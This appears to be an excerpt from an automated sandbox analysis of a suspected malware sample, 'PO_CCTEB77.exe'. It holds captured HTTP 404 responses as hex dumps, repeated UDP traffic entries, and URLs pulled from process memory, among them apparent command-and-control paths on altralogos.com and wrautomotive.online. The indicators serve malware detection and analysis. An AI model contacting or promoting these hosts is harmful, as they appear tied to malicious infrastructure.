64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:33 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:38 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:41 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:43 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 6
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: isoburn.exe, 00000005.00000002.4476014647.00000000068DC000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003FBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://altralogos.com/ahec/?KHcH=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005796000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000002E76000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2368458736.00000000049B6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: PO_CCTEB77.exe, 00000000.00000002.2045447270.00000000031A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: PO_CCTEB77.exeString found in binary or memory: http://tempuri.org/Database1DataSet.xsd
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4479415286.0000000004E26000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wrautomotive.online
            Source: AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4479415286.0000000004E26000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wrautomotive.online/ahec/
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://2domains.ru
            Source: isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2368356075.000000000844A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
            Source: isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2368356075.000000000844A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
            Source: isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff)
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff2)
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff)
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff2)
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000006102000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.00000000037E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2368356075.000000000844A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
